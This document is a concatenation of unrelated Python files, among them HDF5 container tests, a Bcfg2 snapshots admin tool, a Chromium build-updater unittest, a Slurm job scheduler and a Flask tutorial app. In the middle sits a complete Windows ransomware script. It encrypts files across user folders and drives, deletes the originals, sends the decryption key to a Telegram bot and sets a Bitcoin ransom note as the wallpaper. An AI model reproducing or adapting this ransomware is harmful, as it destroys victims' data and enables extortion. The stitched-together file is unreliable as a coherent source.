def container_on_disk():
fname = "tmp_test_memh5_select.h5"
container = GainData(freq=freqs, input=inputs, time=times)
container.create_dataset("gain", data=dset1.view())
container.create_dataset("weight", data=dset2.view())
container.save(fname)
yield fname
# Ensure that all ranks have run their tests before deleting
if size > 1:
comm.Barrier()
# tear down
file_names = glob.glob(fname + "*")
if rank == 0:
for fname in file_names:
os.remove(fname)
local_from = int(len_axis / size * rank)
local_to = int(len_axis / size * (rank + 1))
global_data1 = np.arange(len_axis * len_axis * len_axis, dtype=np.float32)
local_data1 = global_data1.reshape(len_axis, -1, len_axis)[local_from:local_to]
d_array1 = mpiarray.MPIArray.wrap(local_data1, axis=0)
global_data2 = np.arange(len_axis * len_axis, dtype=np.float32)
local_data2 = global_data2.reshape(len_axis, -1)[local_from:local_to]
d_array2 = mpiarray.MPIArray.wrap(local_data2, axis=0)
@pytest.fixture
def container_on_disk_distributed():
fname = "tmp_test_memh5_select_distributed.h5"
container = GainData(freq=freqs, input=inputs, time=times)
container.create_dataset("gain", data=d_array1)
container.create_dataset("weight", data=d_array2)
container.save(fname)
# load file and apply selection
md = GainData.from_file(
fname, freq_sel=fsel, input_sel=isel, time_sel=tsel, distributed=True
)
# save it again
md.save(fname)
yield fname
# Ensure that all ranks have run their tests before deleting
if size > 1:
comm.Barrier()
# tear down
file_names = glob.glob(fname + "*")
if rank == 0:
for fname in file_names:
os.remove(fname)
def test_H5FileSelect(container_on_disk):
"""Tests that makes hdf5 objects and tests selecting on their axes."""
m = GainData.from_file(
container_on_disk, freq_sel=fsel, input_sel=isel, time_sel=tsel
)
assert np.all(m["gain"][:] == dset1[(fsel, isel, tsel)])
assert np.all(m["weight"][:] == dset2[(fsel, tsel)])
assert np.all(m.index_map["freq"] == freqs[fsel])
assert np.all(m.index_map["input"] == inputs[isel])
assert np.all(m.index_map["time"] == times[tsel])
def test_H5FileSelect_distributed(container_on_disk):
"""Load H5 into parallel container while down-selecting axes."""
m = GainData.from_file(
container_on_disk,
freq_sel=fsel,
input_sel=isel,
time_sel=tsel,
distributed=True,
)
assert np.all(m["gain"][:] == dset1[(fsel, isel, tsel)])
assert np.all(m["weight"][:] == dset2[(fsel, tsel)])
assert np.all(m.index_map["freq"] == freqs[fsel])
assert np.all(m.index_map["input"] == inputs[isel])
assert np.all(m.index_map["time"] == times[tsel])
def test_H5FileSelect_distributed_on_disk(container_on_disk_distributed):
"""Load distributed H5 into parallel container while down-selecting axes."""
if rank == 0:
md = GainData.from_file(container_on_disk_distributed, distributed=False)
assert np.all(md["gain"][:] == dset1[(fsel, isel, tsel)])
assert np.all(md["weight"][:] == dset2[(fsel, tsel)])
assert np.all(md.index_map["freq"] == freqs[fsel])
assert np.all(md.index_map["input"] == inputs[isel])
assert np.all(md.index_map["time"] == times[tsel])
def test_test_H5FileSelect_distributed_on_disk_simple():
"""
Load distributed H5 into parallel container while down-selecting axes.
This test does the same as `test_H5FileSelect_distributed_on_disk` but it checks the
frequencies distributed to each node after selection instead of writing to disk
before checking.
"""
if size != 4:
pytest.skip("This test has to be run with mpirun -np 4")
len_axis = 8
local_from = int(len_axis / size * rank)
local_to = int(len_axis / size * (rank + 1))
global_data1 = np.arange(len_axis * len_axis * len_axis, dtype=np.int)
local_data1 = global_data1.reshape(len_axis, -1, len_axis)[local_from:local_to]
d_array1 = mpiarray.MPIArray.wrap(local_data1, axis=0)
global_data2 = np.arange(len_axis * len_axis, dtype=np.int)
local_data2 = global_data2.reshape(len_axis, -1)[local_from:local_to]
d_array2 = mpiarray.MPIArray.wrap(local_data2, axis=0)
fname = "tmp_test_memh5_select_distributed_simple.h5"
container = GainData(freq=freqs, input=inputs, time=times)
container.create_dataset("gain", data=d_array1)
container.create_dataset("weight", data=d_array2)
container.save(fname)
# load file and apply selection
fsel = slice(5)
md = GainData.from_file(fname, freq_sel=fsel, distributed=True)
# test
if rank == 0:
# should hold freq indices 0 and 1
assert np.all(md["gain"][:] == dset1[(slice(2), slice(None), slice(None))])
assert np.all(md["weight"][:] == dset2[(slice(2), slice(None))])
assert np.all(md.index_map["freq"] == freqs[fsel])
else:
# should hold 1 freq index each
assert np.all(
md["weight"][:] == dset2[(slice(rank + 1, rank + 2), slice(None))]
)
assert np.all(
md["gain"][:]
== dset1[(slice(rank + 1, rank + 2), slice(None), slice(None))]
)
assert np.all(md.index_map["freq"] == freqs[fsel])
# tear down
file_names = glob.glob(fname + "*")
if rank == 0:
for fname in file_names:
os.remove(fname)
|
from datetime import date
import sys
# Prereq issues can be signaled with ImportError, so no try needed
import sqlalchemy, sqlalchemy.orm
import Bcfg2.Server.Admin
import Bcfg2.Server.Snapshots
import Bcfg2.Server.Snapshots.model
from Bcfg2.Server.Snapshots.model import Snapshot, Client, Metadata, Base, \
File, Group, Package, Service
# Compatibility import
from Bcfg2.Bcfg2Py3k import u_str
class Snapshots(Bcfg2.Server.Admin.Mode):
__shorthelp__ = "Interact with the Snapshots system"
__longhelp__ = (__shorthelp__ + "\n\nbcfg2-admin snapshots init"
"\nbcfg2-admin query qtype\n")
__usage__ = ("bcfg2-admin snapshots [init|query qtype]")
q_dispatch = {'client': Client,
'group': Group,
'metadata': Metadata,
'package': Package,
'snapshot': Snapshot}
def __init__(self, setup):
Bcfg2.Server.Admin.Mode.__init__(self, setup)
self.session = Bcfg2.Server.Snapshots.setup_session(self.configfile)
self.cfile = self.configfile
def __call__(self, args):
Bcfg2.Server.Admin.Mode.__call__(self, args)
if len(args) == 0 or args[0] == '-h':
print(self.__usage__)
raise SystemExit(0)
if args[0] == 'query':
if args[1] in self.q_dispatch:
q_obj = self.q_dispatch[args[1]]
if q_obj == Client:
rows = []
labels = ('Client', 'Active')
for host in \
self.session.query(q_obj).filter(q_obj.active == False):
rows.append([host.name, 'No'])
for host in \
self.session.query(q_obj).filter(q_obj.active == True):
rows.append([host.name, 'Yes'])
self.print_table([labels]+rows,
justify='left',
hdr=True,
vdelim=" ",
padding=1)
elif q_obj == Group:
print("Groups:")
for group in self.session.query(q_obj).all():
print(" %s" % group.name)
else:
results = self.session.query(q_obj).all()
else:
print('error')
raise SystemExit(1)
elif args[0] == 'init':
# Initialize the Snapshots database
dbpath = Bcfg2.Server.Snapshots.db_from_config(self.cfile)
engine = sqlalchemy.create_engine(dbpath, echo=True)
metadata = Base.metadata
metadata.create_all(engine)
Session = sqlalchemy.orm.sessionmaker()
Session.configure(bind=engine)
session = Session()
session.commit()
elif args[0] == 'dump':
client = args[1]
snap = Snapshot.get_current(self.session, u_str(client))
if not snap:
print("Current snapshot for %s not found" % client)
sys.exit(1)
print("Client %s last run at %s" % (client, snap.timestamp))
for pkg in snap.packages:
print("C:", pkg.correct, 'M:', pkg.modified)
print("start", pkg.start.name, pkg.start.version)
print("end", pkg.end.name, pkg.end.version)
elif args[0] == 'reports':
# bcfg2-admin reporting interface for Snapshots
if '-a' in args[1:]:
# Query all hosts for Name, Status, Revision, Timestamp
q = self.session.query(Client.name,
Snapshot.correct,
Snapshot.revision,
Snapshot.timestamp)\
.filter(Client.id==Snapshot.client_id)\
.group_by(Client.id)
rows = []
labels = ('Client', 'Correct', 'Revision', 'Time')
for item in q.all():
cli, cor, time, rev = item
rows.append([cli, cor, time, rev])
self.print_table([labels]+rows,
justify='left',
hdr=True, vdelim=" ",
padding=1)
elif '-b' in args[1:]:
# Query a single host for bad entries
if len(args) < 3:
print("Usage: bcfg2-admin snapshots -b <client>")
return
client = args[2]
snap = Snapshot.get_current(self.session, u_str(client))
if not snap:
print("Current snapshot for %s not found" % client)
sys.exit(1)
print("Bad entries:")
bad_pkgs = [self.session.query(Package)
.filter(Package.id==p.start_id).one().name \
for p in snap.packages if p.correct == False]
for p in bad_pkgs:
print(" Package:%s" % p)
bad_files = [self.session.query(File)
.filter(File.id==f.start_id).one().name \
for f in snap.files if f.correct == False]
for filename in bad_files:
print(" File:%s" % filename)
bad_svcs = [self.session.query(Service)
.filter(Service.id==s.start_id).one().name \
for s in snap.services if s.correct == False]
for svc in bad_svcs:
print(" Service:%s" % svc)
elif '-e' in args[1:]:
# Query a single host for extra entries
client = args[2]
snap = Snapshot.get_current(self.session, u_str(client))
if not snap:
print("Current snapshot for %s not found" % client)
sys.exit(1)
print("Extra entries:")
for pkg in snap.extra_packages:
print(" Package:%s" % pkg.name)
# FIXME: Do we know about extra files yet?
for f in snap.extra_files:
print(" File:%s" % f.name)
for svc in snap.extra_services:
print(" Service:%s" % svc.name)
elif '--date' in args[1:]:
year, month, day = args[2:]
timestamp = date(int(year), int(month), int(day))
snaps = []
for client in self.session.query(Client).filter(Client.active == True):
snaps.append(Snapshot.get_by_date(self.session,
client.name,
timestamp))
rows = []
labels = ('Client', 'Correct', 'Revision', 'Time')
for snap in snaps:
rows.append([snap.client.name,
snap.correct,
snap.revision,
snap.timestamp])
self.print_table([labels]+rows,
justify='left',
hdr=True,
vdelim=" ",
padding=1)
else:
print("Unknown options: ", args[1:])
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import update_reference_build as update_ref_build
# Disable for accessing private API of update_reference_build class.
# pylint: disable=protected-access
class UpdateReferenceBuildUnittest(unittest.TestCase):
def testInit(self):
@classmethod
def EmptyVersions(_):
return {}
@classmethod
def AllOmahaVersion1(_):
return {'mac':'1', 'linux':'1', 'win':'1'}
@classmethod
def AllCurrentVersion1(_):
return {'Mac':'1', 'Linux':'1', 'Linux_x64':'1', 'Win':'1'}
@classmethod
def MixedOmahaVersion23(_):
return {'mac':'2', 'linux':'3', 'win':'2'}
@classmethod
def MissingOmahaVersion(_):
return {'mac':'2', 'win':'1'}
old_stable = update_ref_build.BuildUpdater._OmahaVersionsMap
old_current = update_ref_build.BuildUpdater._CurrentRefBuildsMap
try:
update_ref_build.BuildUpdater._CurrentRefBuildsMap = EmptyVersions
update_ref_build.BuildUpdater._OmahaVersionsMap = AllOmahaVersion1
expected_versions = {'Mac':'1', 'Linux':'1', 'Linux_x64':'1', 'Win':'1'}
b = update_ref_build.BuildUpdater()
self.assertEqual(expected_versions, b._platform_to_version_map)
update_ref_build.BuildUpdater._OmahaVersionsMap = MissingOmahaVersion
expected_versions = {'Mac':'2', 'Win':'1'}
b = update_ref_build.BuildUpdater()
self.assertEqual(expected_versions, b._platform_to_version_map)
update_ref_build.BuildUpdater._CurrentRefBuildsMap = AllCurrentVersion1
expected_versions = {'Mac':'2'}
b = update_ref_build.BuildUpdater()
self.assertEqual(expected_versions, b._platform_to_version_map)
update_ref_build.BuildUpdater._OmahaVersionsMap = MixedOmahaVersion23
expected_versions = {'Mac':'2', 'Linux':'3', 'Linux_x64':'3', 'Win':'2'}
b = update_ref_build.BuildUpdater()
self.assertEqual(expected_versions, b._platform_to_version_map)
finally:
update_ref_build.BuildUpdater._OmahaVersionsMap = old_stable
update_ref_build.BuildUpdater._CurrentRefBuildsMap = old_current
def testOmahaVersions(self):
#This is an example of valid output from the _OmahaReport function.
#Taken from processing the omaha report on 3/18/15
lines = [['os', 'channel', 'current_version', 'previous_version',
'current_reldate', 'previous_reldate', 'branch_base_commit',
'branch_base_position', 'branch_commit', 'base_webkit_position',
'true_branch', 'v8_version\n'],
['win', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
'03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
'4.1.0.21\n'],
['mac', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
'03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
'4.1.0.21\n'],
['linux', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
'03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
'4.1.0.21\n'],
['cros', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
'03/04/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
'4.1.0.21\n'],
['android', 'stable', '41.0.2272.94', '40.0.2214.109', '03/18/15',
'02/04/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
'70c994cb9b14e4c6934654aaa7089b4b2e8f7788', '188177', '2272',
'4.1.0.21\n'],
['ios', 'stable', '41.0.2272.56', '40.0.2214.73', '03/16/15',
'02/18/15', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A\n']]
@classmethod
def GetLines(_):
return lines
old_omaha_report = update_ref_build.BuildUpdater._OmahaReport
update_ref_build.BuildUpdater._OmahaReport = GetLines
expected_versions = {'win':'41.0.2272.89', 'mac':'41.0.2272.89',
'linux':'41.0.2272.89'}
b = update_ref_build.BuildUpdater()
try:
versions = b._OmahaVersionsMap()
self.assertEqual(expected_versions, versions)
lines = [['os', 'channel', 'current_version', 'previous_version',
'current_reldate', 'previous_reldate', 'branch_base_commit',
'branch_base_position', 'branch_commit', 'base_webkit_position',
'true_branch', 'v8_version\n'],
['win', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
'03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4',
'310958', 'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177',
'master', '4.1.0.21\n']]
self.assertRaises(ValueError, b._OmahaVersionsMap)
lines = ['random', 'list', 'of', 'strings']
self.assertRaises(ValueError, b._OmahaVersionsMap)
lines = []
self.assertRaises(ValueError, b._OmahaVersionsMap)
finally:
update_ref_build.BuildUpdater._OmahaReport = old_omaha_report
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Scheduling and job monitoring utilities.
"""
from contextlib import contextmanager, ExitStack
from dataclasses import dataclass, field
import logging
from pathlib import Path
import pickle
import os
import subprocess as sp
import sys
import typing as tp
from submitit import SlurmJob
import submitit
from . import git_save
from .conf import SlurmConfig, SubmitRules
from .distrib import get_distrib_spec
from .main import DecoratedMain
from .utils import try_load
from .xp import XP, _get_sig
logger = logging.getLogger(__name__)
class _SubmitItTarget:
def __call__(self, main: DecoratedMain, argv: tp.Sequence[str]):
self.xp = main.get_xp(argv)
sys.argv[1:] = argv
main()
def checkpoint(self, *args, **kwargs):
if get_distrib_spec().rank == 0:
# cleanup rendezvous file on requeue, otherwise things will fail.
if self.xp.rendezvous_file.exists():
self.xp.rendezvous_file.unlink()
return submitit.helpers.DelayedSubmission(self, *args, **kwargs)
class Sheep:
"""
A Sheep is a specific run for a given XP. Sheeps are managed
by the Shepherd.
"""
def __init__(self, xp: XP, job: SlurmJob = None):
self.xp = xp
self.job: tp.Optional[submitit.SlurmJob] = None
# Other jobs contain the list of other jobs in the array
self._other_jobs: tp.Optional[tp.List[submitit.SlurmJob]] = None
if self._job_file.exists():
content = try_load(self._job_file)
if isinstance(content, tuple):
self.job, self._other_jobs = content
else:
self.job = content
@property
def _job_file(self) -> Path:
return self.xp.folder / self.xp.dora.shep.job_file
def state(self, mode="standard"):
"""Return the current state of the `Sheep`.
"""
if self.job is None:
return None
state = self.job.watcher.get_state(self.job.job_id, mode)
if state == 'UNKNOWN' and self._other_jobs:
if any(job.state != 'UNKNOWN' for job in self._other_jobs):
# When cancelling single entries in a job array,
# sacct will just completely forget about it insted of marking
# it as cancelled. So we use a specific 'MISSING' status to handle that.
state = 'MISSING'
if state.startswith('CANCELLED'):
return 'CANCELLED'
return state
def is_done(self, mode="standard"):
"""Return True if the job is no longer running on the cluster.
"""
if self.job is None:
return True
return self.job.watcher.is_done(self.job.job_id, mode)
@property
def log(self):
"""Return the path to the main log.
"""
if self.job is not None:
return self.xp.submitit / f"{self.job.job_id}_0_log.out"
return None
def __repr__(self):
out = f"Sheep({self.xp.sig}, state={self.state()}, "
if self.job is not None:
out += f"sid={self.job.job_id}, "
out += f"argv={self.xp.argv})"
return out
def no_log(x: str):
"""No logging logging function, passed to `Shepherd`.
"""
pass
@dataclass
class _JobArray:
slurm_config: SlurmConfig
sheeps: tp.List[Sheep] = field(default_factory=list)
class Shepherd:
"""
Takes care of the little jobs.
Args:
main (DecoratedMain): main function decorated by Dora.
log (callable): log function, if provided should take a single string
argument.
"""
def __init__(self, main: DecoratedMain, log: tp.Callable[[str], None] = no_log):
self.main = main
self._by_id.mkdir(exist_ok=True, parents=True)
self._orphans.mkdir(exist_ok=True, parents=True)
self._arrays.mkdir(exist_ok=True, parents=True)
self.log = log
self._in_job_array: bool = False
self._existing_git_clone: tp.Optional[Path] = None
self._to_cancel: tp.List[submitit.SlurmJob] = []
self._to_submit: tp.List[_JobArray] = []
self._check_orphans()
def get_sheep_from_argv(self, argv: tp.Sequence[str]) -> Sheep:
"""
Given a list of of arguments, return the matching `Sheep`,
which will contain both information on the `dora.xp.XP`, and on
the latest job associated with that XP.
"""
assert not isinstance(argv, str)
xp = self.main.get_xp(argv)
return Sheep(xp)
def get_sheep_from_sig(self, sig: str) -> tp.Optional[Sheep]:
"""
Returns a `Sheep` given the XP signature, if any exists, otherwise
returns None.
"""
xp = self.main.get_xp_from_sig(sig)
return Sheep(xp)
def get_sheep_from_job_id(self, job_id: str) -> tp.Optional[Sheep]:
"""
Returns the `Sheep` associated with the given `job_id`. If no sheep
is found, returns None.
"""
link = self._by_id / job_id
if link.is_symlink():
sig = link.resolve().name
xp = self.main.get_xp_from_sig(sig)
return Sheep(xp)
return None
def update(self):
"""
Force an update of all job states with submitit.
"""
SlurmJob.watcher.update()
@contextmanager
def job_array(self, slurm_config: SlurmConfig):
"""Context manager to launch XP in job array."""
assert not self._in_job_array
self._to_submit.append(_JobArray(slurm_config))
self._in_job_array = True
try:
yield
finally:
self._in_job_array = False
def maybe_submit_lazy(self, sheep: Sheep, slurm_config: SlurmConfig, rules: SubmitRules):
"""
Decides whether to schedule a new job for the given sheep, based on the rules
given in `rules`.
Jobs are actually only scheduled once the `commit()` method is called.
"""
if sheep.job is not None:
state = sheep.state()
if state == 'COMPLETED':
if rules.replace_done:
logger.debug(f"Ignoring previously completed job {sheep.job.job_id}")
sheep.job = None
elif state in ["FAILED", "CANCELLED", "OUT_OF_MEMORY", "TIMEOUT", "MISSING"]:
logger.debug(f"Previous job {sheep.job.job_id} failed or was canceled")
if rules.retry:
sheep.job = None
else:
if rules.replace:
logger.debug(f"Cancelling previous job {sheep.job.job_id} with status {state}")
self.cancel_lazy(sheep.job)
sheep.job = None
if sheep.job is None:
if not self._in_job_array:
self._to_submit.append(_JobArray(slurm_config))
assert slurm_config == self._to_submit[-1].slurm_config
self._to_submit[-1].sheeps.append(sheep)
def cancel_lazy(self, job: submitit.SlurmJob):
"""
Cancel a job. The job is actually cancelled only when `commit()` is called.
"""
self._to_cancel.append(job)
def commit(self):
"""
Commit all changes registered so far with either `maybe_submit_lazy()`
and `cancel_lazy()`.
"""
if self._to_cancel:
self._cancel(self._to_cancel)
self._to_cancel = []
self._existing_git_clone = None
while self._to_submit:
job_array = self._to_submit.pop(0)
self._submit(job_array)
@property
def _by_id(self) -> Path:
return self.main.dora.dir / self.main.dora.shep.by_id
@property
def _orphans(self) -> Path:
return self.main.dora.dir / self.main.dora.shep.orphans
@property
def _arrays(self) -> Path:
return self.main.dora.dir / self.main.dora.shep.arrays
def _cancel(self, jobs: tp.List[SlurmJob]):
cancel_cmd = ["scancel"] + [job.job_id for job in jobs]
logger.debug("Running %s", " ".join(cancel_cmd))
sp.run(cancel_cmd, check=True)
def _get_submitit_executor(self, name: str, folder: Path,
slurm_config: SlurmConfig) -> submitit.SlurmExecutor:
os.environ['SLURM_KILL_BAD_EXIT'] = '1' # Kill the job if any of the task fails
kwargs = dict(slurm_config.__dict__)
executor = submitit.SlurmExecutor(
folder=folder, max_num_timeout=kwargs.pop('max_num_timeout'))
gpus = slurm_config.gpus
if gpus > 8:
if gpus % 8 != 0:
raise ValueError("Can only take <= 8 gpus, or multiple of 8 gpus")
kwargs['nodes'] = gpus // 8
gpus_per_node = 8
else:
gpus_per_node = gpus
kwargs['nodes'] = 1
mem = slurm_config.mem_per_gpu * gpus_per_node
kwargs['mem'] = f"{mem}GB"
if slurm_config.one_task_per_node:
kwargs['gpus_per_task'] = gpus_per_node
kwargs['ntasks_per_node'] = 1
if slurm_config.cpus_per_task is None:
kwargs['cpus_per_task'] = gpus_per_node * slurm_config.cpus_per_gpu
else:
kwargs['gpus_per_task'] = 1
kwargs['ntasks_per_node'] = gpus_per_node
if slurm_config.cpus_per_task is None:
kwargs['cpus_per_task'] = slurm_config.cpus_per_gpu
del kwargs['gpus']
del kwargs['mem_per_gpu']
del kwargs['cpus_per_gpu']
del kwargs['one_task_per_node']
logger.debug("Slurm parameters %r", kwargs)
executor.update_parameters(
job_name=name,
stderr_to_stdout=True,
**kwargs)
return executor
def _check_orphans(self):
"""Check for orphaned jobs."""
for dirty in self._orphans.iterdir():
name = dirty.name
logger.warning(f"Found dirty tag {name}, meaning a job might have been scheduled "
"but Dora or Slurm crashed before the job id was saved.")
proc = sp.run(["squeue", "-u", os.getlogin(), "-n", name, "-o", "%i", "-h"],
capture_output=True, check=True)
ids = [line for line in proc.stdout.decode().strip().split("\n") if line]
if ids:
logger.warning(f"Found orphan job ids {ids}, will cancel")
sp.run(["scancel"] + ids, check=True)
dirty.unlink()
@contextmanager
def _enter_orphan(self, name: str):
"""Context manager to enter a potential orphan."""
token = self._orphans / name
token.touch()
try:
yield
finally:
token.unlink()
def _submit(self, job_array: _JobArray):
sheeps = job_array.sheeps
slurm_config = job_array.slurm_config
if not sheeps:
return
is_array = len(sheeps) > 1
first = sheeps[0]
self.main.init_xp(first.xp)
use_git_save = first.xp.dora.git_save
assert all(other.xp.dora.git_save == use_git_save for other in sheeps), \
"All jobs inside an array must have the same value for git_save."""
if is_array:
name_sig = _get_sig(sorted([sheep.xp.sig for sheep in sheeps]))
else:
name_sig = first.xp.sig
if is_array:
name = self.main.name + "_array_" + name_sig
else:
name = self.main.name + "_" + name_sig
if is_array:
submitit_folder = self._arrays / name
else:
submitit_folder = first.xp._xp_submitit
submitit_folder.mkdir(exist_ok=True)
for sheep in sheeps:
xp = sheep.xp
self.main.init_xp(xp)
if xp.rendezvous_file.exists():
xp.rendezvous_file.unlink()
executor = self._get_submitit_executor(name, submitit_folder, slurm_config)
jobs: tp.List[submitit.Job] = []
if use_git_save and self._existing_git_clone is None:
self._existing_git_clone = git_save.get_new_clone(self.main.dora)
with self._enter_orphan(name):
with ExitStack() as stack:
if use_git_save:
assert self._existing_git_clone is not None
stack.enter_context(git_save.enter_clone(self._existing_git_clone))
if is_array:
stack.enter_context(executor.batch())
for sheep in job_array.sheeps:
if use_git_save:
assert self._existing_git_clone is not None
git_save.assign_clone(sheep.xp, self._existing_git_clone)
jobs.append(executor.submit(_SubmitItTarget(), self.main, sheep.xp.argv))
# Now we can access jobs
for sheep, job in zip(sheeps, jobs):
# See commment in `Sheep.state` function above for storing all jobs in the array.
pickle.dump((job, jobs), open(sheep._job_file, "wb"))
logger.debug("Created job with id %s", job.job_id)
sheep.job = job # type: ignore
sheep._other_jobs = jobs # type: ignore
link = self._by_id / job.job_id
link = link
link.symlink_to(sheep.xp.folder.resolve())
if is_array:
# We link the array submitit folder to be sure
# we keep an history of all arrays the XP was in.
submitit_link = (sheep.xp.folder / submitit_folder.name)
if submitit_link.exists():
assert submitit_link.resolve() == submitit_folder.resolve()
else:
submitit_link.symlink_to(submitit_folder)
latest = sheep.xp._latest_submitit
if latest.exists():
latest.unlink()
latest.symlink_to(submitit_folder)
name = self.main.get_name(sheep.xp)
self.log(f"Scheduled job {job.job_id} for sheep {sheep.xp.sig}/{name}")
|
#!/usr/bin/python3
import threading, ctypes, pathlib
import cryptography, os, requests, sys
from PIL import Image, ImageDraw, ImageFont
from win32api import GetSystemMetrics
from cryptography.fernet import Fernet
from tkinter import messagebox
from time import sleep
class D_E_ncrypt(object): # Encrypter Class (Our main Class )
def __init__(self, Target=0, FernetM=0, Url=0):
self.Target = Target # File Path
self.FernetM = FernetM # Our Fernet Moudle
self.Url = Url # Our Api Url in my case Telegram
def FileE(loc): # We Pass File Name And Path In Hare In Order To Encrypt Them
try: # Run Try/Except So We Dont Run in to Error
if (os.path.isdir(loc.Target) != True) : # Cheak If Its File not Directory
with open(loc.Target, "rb") as File: # Opeing File
Date = File.read() # Reading File & Saving it In tmp Var
FileName = loc.Target # File name
Encrypted = loc.FernetM.encrypt(Date) # Encrypting tmp Var
if(loc.Target != sys.argv[0]): # If Target File is not Our own script Do this
with open(f"{FileName}.lol","wb") as File: # Opeing File To write File
print(f"FILE -> {FileName}") # Printing File name for batter Debug
File.write(Encrypted) # Writeing The File
os.remove(loc.Target) # Removing OG File
except Exception as e:print(f"Error -> {e}")
def SendKey(Key): # We Pass Decrypt Key and Api url To Make Get request
requests.get(Key.Url) # We send request
User = os.getlogin() # Getting Username
Script = sys.argv[0] # Getting Our Script name
MaxThread = 120 # Setting up Our max Number of Thread
AdminRight = ctypes.windll.shell32.IsUserAnAdmin() # Cheaking for admin Perms
Key = Fernet.generate_key() # Making A key IN order to D/Encypt with it
FKey = Fernet(Key) # Our Fernet Moudle
Token = "Your Telegram Token So you can Get Decrypt The Files!" # Our Api Token
NumID = "Your User ID so Bot just Send Key To You !" # Our User ID
Message = (f"{User} -> {Key}") # Makeing Prefix for Massges
PathList = [ f"c:\\Users",f"c:\\Users\\{User}\\Desktop", # Our System Path list to Look For
f"c:\\Users\\{User}\\Pictures", # Date To Encrypt .
f"c:\\Users\\{User}\\Documents",
f"c:\\Users\\{User}\\Music",
f"c:\\Users\\{User}\\Downloads", os.getcwd()]
for Latter in range(97,123): (PathList.append(f"{chr(Latter)}:\\")) # Making list of A,Z in order to pass as Drive
PathList.pop(8) # Removing C Drive
print(f"We are -> {Script}") # Remove This line this is just for Debuging
print(f"Key - > {Key}") # Remove This line this is just for Debuging
def OneStart():
try: # Run Try/Except So We Dont Run in to Error
HttpReq = D_E_ncrypt(Url=f"https://api.telegram.org/bot{Token}/sendMessage?chat_id={NumID}&text={Message}")
threading.Thread(target=HttpReq.SendKey, args=()).start() # Making HttpReq Moudle And Runnig it In a Thread
Img = Image.new('RGB', (GetSystemMetrics(0), GetSystemMetrics(1)), color = (0, 0, 0)) # Getting Window Heihgt & Weight To Make Background
Canvas= ImageDraw.Draw(Img) # Drawing Image
font = ImageFont.truetype("arial", int(GetSystemMetrics(1)/20)) # Getting Right Font Size
Canvas.text(
(10,10), (r"""
Your data Is encrypted In order to Get your
> date back Send me (YOUR PRICE USD) in BTC to this Wellt
> and then email me for your key
> YOUR WELLET
> GoodLuck :)
> ~ YOUR NAME """),
fill=(255,0,0),font=font) # Write Text On Image
Img.save('Bg.png') # Save Image as bg.png
ctypes.windll.user32.SystemParametersInfoW(20, 0, f'{os.getcwd()}\\Bg.png' , 0) # Set New Background Up
except:pass
def CallErrorBox(): # Making Simple Error Box in Tk
WINDOW = tkinter.Tk() # Making Tk Window
WINDOW.withdraw() # Destroying Tk Window
messagebox.showerror("Error", "Try To Re-Run As Administrator")
if __name__ == '__main__': # Check IF Script IS Excuted By User.
if(AdminRight): # Check IF Script Have Admin Access
OneStart() # Run On start Def To Send HttpReq
for AllFiles in PathList:
try: # Run Try/Except So We Dont Run in to Error & background
if (pathlib.Path(AllFiles).exists()): # Cheak if Path Exist
for path, subdirs, files in os.walk(AllFiles): # For All Drives & Files
if("$Recycle.Bin" in path): # Skip Junks
pass
elif("c:\\Windows" in path): # Skip c:\\Windows
pass
elif("System32" in path): # Skip System32
pass
else: # After That
for name in files: # For Files in Folder
FilePath = os.path.join(path, name) # Join File path to File Name
FileSize = os.stat(FilePath).st_size # Get The File Size
if(".dll" in name ): # Skip This File Format
pass
elif(".exe" in name ): # Skip This File Format
pass
elif(".msn" in name ): # Skip This File Format
pass
else :
if (FileSize >= 50000000 ): # If File size is More then 50mb make Thread for this file
while True: # Make While Ture
if len(threading.enumerate()) < MaxThread: # IF your Worker List is Free
EncrypterObj = D_E_ncrypt(FilePath, FKey) # Pass in file name And key
threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypte.
break # Break Out
else: sleep(0.2) # Sleep for 0.2 Sec Until Spot Get Free
else :
print(FilePath) # Remove This line this is just for Debuging
D_E_ncrypt(FilePath, FKey).FileE() # Pass In File Name And key
except Exception as e:print(f"Error -> {e}") # remove Print And Replace Ut With Pass
else:
CallErrorBox() # Call Error Box
|
# let's import the flask
from flask import Flask, render_template, request, redirect, url_for
import os # importing operating system module
app = Flask(__name__)
# to stop caching static file
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
@app.route('/') # this decorator create the home route
def home ():
techs = ['HTML', 'CSS', 'Flask', 'Python']
name = '30 Days Of Python Programming'
return render_template('home.html', techs=techs, name = name, title = 'Home')
@app.route('/about')
def about():
name = '30 Days Of Python Programming'
return render_template('about.html', name = name, title = 'About Us')
@app.route('/result')
def result():
return render_template('result.html')
@app.route('/post', methods= ['GET','POST'])
def post():
name = 'Text Analyzer'
if request.method == 'GET':
return render_template('post.html', name = name, title = name)
if request.method =='POST':
content = request.form['content']
return redirect(url_for('result'))
if __name__ == '__main__':
# for deployment
# to make it work for both production and development
port = int(os.environ.get("PORT", 5000))
app.run(debug=True, host='0.0.0.0', port=port)
|
#!/usr/bin/python3
import sys
import os
import binascii
import re
import subprocess
import signal
def handler(x, y):
sys.exit(-1)
signal.signal(signal.SIGALRM, handler)
signal.alarm(30)
def gen_filename():
